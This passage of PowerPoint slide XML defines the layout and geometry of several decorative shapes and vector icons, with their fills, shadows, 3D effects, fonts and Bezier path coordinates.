                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                  <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="Helvetica Neue"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="6" name="Rectangle 7"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8087643" y="4036682"/>
                <a:ext cx="1720740" cy="50962"/>
              </a:xfrm>
              <a:prstGeom prst="rect">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eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                  <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="Helvetica Neue"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="7" name="Rectangle 8"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1765833" y="4036682"/>
                <a:ext cx="1274973" cy="50962"/>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eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                  <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="Helvetica Neue"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="8" name="Rectangle 9"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="9808382" y="4036682"/>
                <a:ext cx="1274973" cy="50962"/>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eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                  <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="Helvetica Neue"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="9" name="Group 10"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="8057" y="2772"/>
              <a:ext cx="2054" cy="3685"/>
              <a:chOff x="7980911" y="2484779"/>
              <a:chExt cx="1304470" cy="2340121"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="10" name="Group 11"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks noChangeAspect="1"/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="7980911" y="2484779"/>
                <a:ext cx="1304470" cy="1802479"/>
                <a:chOff x="3149600" y="2480384"/>
                <a:chExt cx="1201204" cy="1660005"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="17" name="等腰三角形 51"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm flipV="1">
                  <a:off x="3149600" y="3200883"/>
                  <a:ext cx="1201204" cy="939506"/>
                </a:xfrm>
                <a:prstGeom prst="triangle">
                  <a:avLst/>
                </a:prstGeom>
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="0">
                      <a:schemeClr val="accent4"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="EEECE1">
                        <a:lumMod val="90000"/>
                        <a:alpha val="0"/>
                      </a:srgbClr>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
                <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
                  <a:noFill/>
                  <a:prstDash val="solid"/>
                </a:ln>
                <a:effectLst/>
              </p:spPr>
              <p:txBody>
                <a:bodyPr anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                    <a:spcBef>
                      <a:spcPts val="0"/>
                    </a:spcBef>
                    <a:spcAft>
                      <a:spcPts val="0"/>
                    </a:spcAft>
                    <a:defRPr/>
                  </a:pPr>
                  <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                    <a:solidFill>
                      <a:sysClr val="window" lastClr="FFFFFF"/>
                    </a:solidFill>
                    <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                    <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="18" name="矩形 52"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3630724" y="2480384"/>
                  <a:ext cx="720080" cy="720080"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
                  <a:noFill/>
                  <a:prstDash val="solid"/>
                </a:ln>
                <a:effectLst>
                  <a:outerShdw blurRad="40000" dist="23000" dir="5400000" rotWithShape="0">
                    <a:srgbClr val="000000">
                      <a:alpha val="35000"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:scene3d>
                  <a:camera prst="isometricOffAxis2Top">
                    <a:rot lat="19390491" lon="18812960" rev="21592509"/>
                  </a:camera>
                  <a:lightRig rig="chilly" dir="t">
                    <a:rot lat="0" lon="0" rev="600000"/>
                  </a:lightRig>
                </a:scene3d>
                <a:sp3d extrusionH="666750"/>
              </p:spPr>
              <p:txBody>
                <a:bodyPr anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                    <a:spcBef>
                      <a:spcPts val="0"/>
                    </a:spcBef>
                    <a:spcAft>
                      <a:spcPts val="0"/>
                    </a:spcAft>
                    <a:defRPr/>
                  </a:pPr>
                  <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                    <a:solidFill>
                      <a:sysClr val="window" lastClr="FFFFFF"/>
                    </a:solidFill>
                    <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                    <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="11" name="Oval 12"/>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8347955" y="4239008"/>
                <a:ext cx="585892" cy="585892"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ln w="3810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id-ID"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="12" name="Group 13"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="8468992" y="4362838"/>
                <a:ext cx="328308" cy="328308"/>
                <a:chOff x="8216107" y="2577307"/>
                <a:chExt cx="464344" cy="464344"/>
              </a:xfrm>
              <a:solidFill>
                <a:schemeClr val="accent4"/>
              </a:solidFill>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="13" name="AutoShape 52"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="8216107" y="2577307"/>
                  <a:ext cx="464344" cy="464344"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="+- 0 10800 87"/>
                    <a:gd name="T1" fmla="*/ T0 w 21426"/>
                    <a:gd name="T2" fmla="+- 0 10799 73"/>
                    <a:gd name="T3" fmla="*/ 10799 h 21453"/>
                    <a:gd name="T4" fmla="+- 0 10800 87"/>
                    <a:gd name="T5" fmla="*/ T4 w 21426"/>
                    <a:gd name="T6" fmla="+- 0 10799 73"/>
                    <a:gd name="T7" fmla="*/ 10799 h 21453"/>
                    <a:gd name="T8" fmla="+- 0 10800 87"/>
                    <a:gd name="T9" fmla="*/ T8 w 21426"/>
                    <a:gd name="T10" fmla="+- 0 10799 73"/>
                    <a:gd name="T11" fmla="*/ 10799 h 21453"/>
                    <a:gd name="T12" fmla="+- 0 10800 87"/>
                    <a:gd name="T13" fmla="*/ T12 w 21426"/>
                    <a:gd name="T14" fmla="+- 0 10799 73"/>
                    <a:gd name="T15" fmla="*/ 10799 h 21453"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T1" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T5" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T9" y="T11"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T13" y="T15"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="21426" h="21453">
                      <a:moveTo>
                        <a:pt x="8034" y="20112"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="5816" y="17892"/>
                        <a:pt x="3556" y="15628"/>
                        <a:pt x="1338" y="13408"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3241" y="7240"/>
                        <a:pt x="11488" y="7509"/>
                        <a:pt x="13391" y="1341"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="15609" y="3560"/>
                        <a:pt x="17869" y="5825"/>
                        <a:pt x="20087" y="8045"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18184" y="14212"/>
                        <a:pt x="9937" y="13944"/>
                        <a:pt x="8034" y="20112"/>
                      </a:cubicBezTo>
                      <a:moveTo>
                        <a:pt x="21034" y="7097"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="14338" y="393"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="14006" y="60"/>
                        <a:pt x="13525" y="-73"/>
                        <a:pt x="13069" y="39"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12828" y="98"/>
                        <a:pt x="12614" y="222"/>
                        <a:pt x="12444" y="393"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12292" y="545"/>
                        <a:pt x="12177" y="733"/>
                        <a:pt x="12112" y="944"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11808" y="1929"/>
                        <a:pt x="11283" y="2785"/>
                        <a:pt x="10507" y="3562"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9471" y="4598"/>
                        <a:pt x="8121" y="5384"/>
                        <a:pt x="6693" y="6214"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="5177" y="7094"/>
                        <a:pt x="3611" y="8006"/>
                        <a:pt x="2328" y="9290"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1237" y="10383"/>
                        <a:pt x="493" y="11600"/>
                        <a:pt x="59" y="13011"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="-87" y="13488"/>
                        <a:pt x="40" y="14004"/>
                        <a:pt x="391" y="14356"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="7087" y="21060"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="7419" y="21393"/>
                        <a:pt x="7900" y="21526"/>
                        <a:pt x="8356" y="21414"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8597" y="21354"/>
                        <a:pt x="8811" y="21231"/>
                        <a:pt x="8981" y="21060"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9133" y="20908"/>
                        <a:pt x="9248" y="20720"/>
                        <a:pt x="9314" y="20508"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9617" y="19523"/>
                        <a:pt x="10142" y="18667"/>
                        <a:pt x="10918" y="17890"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11954" y="16853"/>
                        <a:pt x="13304" y="16069"/>
                        <a:pt x="14733" y="15239"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="16248" y="14357"/>
                        <a:pt x="17814" y="13446"/>
                        <a:pt x="19097" y="12162"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="20188" y="11070"/>
                        <a:pt x="20932" y="9852"/>
                        <a:pt x="21366" y="8440"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21512" y="7965"/>
                        <a:pt x="21385" y="7448"/>
                        <a:pt x="21034" y="7097"/>
                      </a:cubicBezTo>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14" name="AutoShape 53"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="8390732" y="2736850"/>
                  <a:ext cx="125413" cy="130175"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="+- 0 10801 59"/>
                    <a:gd name="T1" fmla="*/ T0 w 21484"/>
                    <a:gd name="T2" fmla="+- 0 10799 41"/>
                    <a:gd name="T3" fmla="*/ 10799 h 21516"/>
                    <a:gd name="T4" fmla="+- 0 10801 59"/>
                    <a:gd name="T5" fmla="*/ T4 w 21484"/>
                    <a:gd name="T6" fmla="+- 0 10799 41"/>
                    <a:gd name="T7" fmla="*/ 10799 h 21516"/>
                    <a:gd name="T8" fmla="+- 0 10801 59"/>
                    <a:gd name="T9" fmla="*/ T8 w 21484"/>
                    <a:gd name="T10" fmla="+- 0 10799 41"/>
                    <a:gd name="T11" fmla="*/ 10799 h 21516"/>
                    <a:gd name="T12" fmla="+- 0 10801 59"/>
                    <a:gd name="T13" fmla="*/ T12 w 21484"/>
                    <a:gd name="T14" fmla="+- 0 10799 41"/>
                    <a:gd name="T15" fmla="*/ 10799 h 21516"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T1" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T5" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T9" y="T11"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T13" y="T15"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="21484" h="21516">
                      <a:moveTo>
                        <a:pt x="17511" y="14987"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="17287" y="15384"/>
                        <a:pt x="17032" y="15740"/>
                        <a:pt x="16731" y="16049"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="15340" y="14692"/>
                        <a:pt x="13947" y="13205"/>
                        <a:pt x="12559" y="11675"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12912" y="11521"/>
                        <a:pt x="13287" y="11362"/>
                        <a:pt x="13689" y="11198"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="14092" y="11034"/>
                        <a:pt x="14494" y="10927"/>
                        <a:pt x="14895" y="10861"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="15308" y="10801"/>
                        <a:pt x="15715" y="10819"/>
                        <a:pt x="16122" y="10913"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="16527" y="11011"/>
                        <a:pt x="16909" y="11222"/>
                        <a:pt x="17262" y="11554"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17612" y="11890"/>
                        <a:pt x="17835" y="12244"/>
                        <a:pt x="17923" y="12620"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18020" y="13004"/>
                        <a:pt x="18025" y="13392"/>
                        <a:pt x="17958" y="13789"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17883" y="14187"/>
                        <a:pt x="17738" y="14585"/>
                        <a:pt x="17511" y="14987"/>
                      </a:cubicBezTo>
                      <a:moveTo>
                        <a:pt x="5799" y="10193"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="5096" y="10221"/>
                        <a:pt x="4482" y="9996"/>
                        <a:pt x="3946" y="9496"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3717" y="9285"/>
                        <a:pt x="3558" y="9028"/>
                        <a:pt x="3461" y="8724"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3359" y="8420"/>
                        <a:pt x="3326" y="8088"/>
                        <a:pt x="3366" y="7723"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3397" y="7363"/>
                        <a:pt x="3509" y="6989"/>
                        <a:pt x="3703" y="6610"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3889" y="6231"/>
                        <a:pt x="4160" y="5852"/>
                        <a:pt x="4510" y="5487"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="5768" y="6694"/>
                        <a:pt x="7022" y="8018"/>
                        <a:pt x="8282" y="9388"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7330" y="9893"/>
                        <a:pt x="6501" y="10164"/>
                        <a:pt x="5799" y="10193"/>
                      </a:cubicBezTo>
                      <a:moveTo>
                        <a:pt x="19678" y="8570"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="18868" y="7915"/>
                        <a:pt x="18055" y="7470"/>
                        <a:pt x="17235" y="7250"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="16421" y="7031"/>
                        <a:pt x="15603" y="6942"/>
                        <a:pt x="14779" y="6998"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="13964" y="7059"/>
                        <a:pt x="13130" y="7236"/>
                        <a:pt x="12296" y="7545"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11462" y="7859"/>
                        <a:pt x="10625" y="8200"/>
                        <a:pt x="9782" y="8593"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8448" y="7115"/>
                        <a:pt x="7114" y="5658"/>
                        <a:pt x="5778" y="4299"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6382" y="3775"/>
                        <a:pt x="6963" y="3509"/>
                        <a:pt x="7526" y="3490"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8088" y="3467"/>
                        <a:pt x="8631" y="3523"/>
                        <a:pt x="9145" y="3649"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9669" y="3775"/>
                        <a:pt x="10149" y="3883"/>
                        <a:pt x="10590" y="3967"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11038" y="4051"/>
                        <a:pt x="11424" y="3958"/>
                        <a:pt x="11765" y="3682"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12123" y="3382"/>
                        <a:pt x="12321" y="2994"/>
                        <a:pt x="12351" y="2526"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12376" y="2054"/>
                        <a:pt x="12189" y="1596"/>
                        <a:pt x="11782" y="1147"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11258" y="569"/>
                        <a:pt x="10630" y="216"/>
                        <a:pt x="9872" y="85"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9126" y="-41"/>
                        <a:pt x="8358" y="-30"/>
                        <a:pt x="7564" y="136"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6780" y="309"/>
                        <a:pt x="6032" y="595"/>
                        <a:pt x="5324" y="997"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="4617" y="1399"/>
                        <a:pt x="4048" y="1811"/>
                        <a:pt x="3626" y="2213"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3464" y="2066"/>
                        <a:pt x="3302" y="1918"/>
                        <a:pt x="3141" y="1773"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2963" y="1614"/>
                        <a:pt x="2739" y="1530"/>
                        <a:pt x="2471" y="1535"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2200" y="1535"/>
                        <a:pt x="1977" y="1647"/>
                        <a:pt x="1793" y="1853"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1615" y="2054"/>
                        <a:pt x="1530" y="2288"/>
                        <a:pt x="1565" y="2536"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1589" y="2793"/>
                        <a:pt x="1696" y="2989"/>
                        <a:pt x="1880" y="3139"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2044" y="3270"/>
                        <a:pt x="2203" y="3401"/>
                        <a:pt x="2364" y="3537"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1731" y="4276"/>
                        <a:pt x="1207" y="5094"/>
                        <a:pt x="795" y="5957"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="378" y="6820"/>
                        <a:pt x="130" y="7676"/>
                        <a:pt x="37" y="8509"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="-59" y="9346"/>
                        <a:pt x="33" y="10113"/>
                        <a:pt x="298" y="10824"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="566" y="11540"/>
                        <a:pt x="1056" y="12148"/>
                        <a:pt x="1774" y="12723"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2942" y="13658"/>
                        <a:pt x="4321" y="14056"/>
                        <a:pt x="5915" y="13967"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7507" y="13874"/>
                        <a:pt x="9223" y="13415"/>
                        <a:pt x="11064" y="12461"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12532" y="14093"/>
                        <a:pt x="14002" y="15716"/>
                        <a:pt x="15470" y="17223"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="14849" y="17728"/>
                        <a:pt x="14305" y="18018"/>
                        <a:pt x="13826" y="18111"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="13344" y="18210"/>
                        <a:pt x="12917" y="18200"/>
                        <a:pt x="12530" y="18088"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12142" y="17971"/>
                        <a:pt x="11782" y="17803"/>
                        <a:pt x="11455" y="17587"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11125" y="17368"/>
                        <a:pt x="10799" y="17181"/>
                        <a:pt x="10474" y="17026"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="10154" y="16872"/>
                        <a:pt x="9823" y="16788"/>
                        <a:pt x="9486" y="16783"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9145" y="16778"/>
                        <a:pt x="8785" y="16937"/>
                        <a:pt x="8388" y="17265"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7981" y="17606"/>
                        <a:pt x="7777" y="18004"/>
                        <a:pt x="7777" y="18453"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7777" y="18897"/>
                        <a:pt x="7991" y="19351"/>
                        <a:pt x="8408" y="19809"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8830" y="20268"/>
                        <a:pt x="9379" y="20651"/>
                        <a:pt x="10042" y="20955"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="10708" y="21259"/>
                        <a:pt x="11455" y="21451"/>
                        <a:pt x="12279" y="21502"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="13103" y="21559"/>
                        <a:pt x="13970" y="21437"/>
                        <a:pt x="14886" y="21109"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="15807" y="20787"/>
                        <a:pt x="16721" y="20202"/>
                        <a:pt x="17617" y="19332"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18051" y="19739"/>
                        <a:pt x="18489" y="20127"/>
                        <a:pt x="18921" y="20501"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="19107" y="20656"/>
                        <a:pt x="19328" y="20731"/>
                        <a:pt x="19601" y="20712"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="19861" y="20703"/>
                        <a:pt x="20090" y="20586"/>
                        <a:pt x="20269" y="20375"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="20455" y="20160"/>
                        <a:pt x="20532" y="19921"/>
                        <a:pt x="20503" y="19674"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="20477" y="19421"/>
                        <a:pt x="20371" y="19229"/>
                        <a:pt x="20192" y="19089"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="19755" y="18752"/>
                        <a:pt x="19321" y="18397"/>
                        <a:pt x="18884" y="18022"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="19626" y="17143"/>
                        <a:pt x="20221" y="16217"/>
                        <a:pt x="20664" y="15300"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21103" y="14379"/>
                        <a:pt x="21367" y="13490"/>
                        <a:pt x="21453" y="12667"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21540" y="11839"/>
                        <a:pt x="21439" y="11091"/>
                        <a:pt x="21159" y="10412"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="20880" y="9725"/>
                        <a:pt x="20386" y="9135"/>
                        <a:pt x="19678" y="8570"/>
                      </a:cubicBezTo>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15" name="AutoShape 54"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="8375650" y="2896394"/>
                  <a:ext cx="70644" cy="73819"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="+- 0 10791 197"/>
                    <a:gd name="T1" fmla="*/ T0 w 21188"/>
                    <a:gd name="T2" fmla="+- 0 10794 193"/>
                    <a:gd name="T3" fmla="*/ 10794 h 21203"/>
                    <a:gd name="T4" fmla="+- 0 10791 197"/>
                    <a:gd name="T5" fmla="*/ T4 w 21188"/>
                    <a:gd name="T6" fmla="+- 0 10794 193"/>
                    <a:gd name="T7" fmla="*/ 10794 h 21203"/>
                    <a:gd name="T8" fmla="+- 0 10791 197"/>
                    <a:gd name="T9" fmla="*/ T8 w 21188"/>
                    <a:gd name="T10" fmla="+- 0 10794 193"/>
                    <a:gd name="T11" fmla="*/ 10794 h 21203"/>
                    <a:gd name="T12" fmla="+- 0 10791 197"/>
                    <a:gd name="T13" fmla="*/ T12 w 21188"/>
                    <a:gd name="T14" fmla="+- 0 10794 193"/>
                    <a:gd name="T15" fmla="*/ 10794 h 21203"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
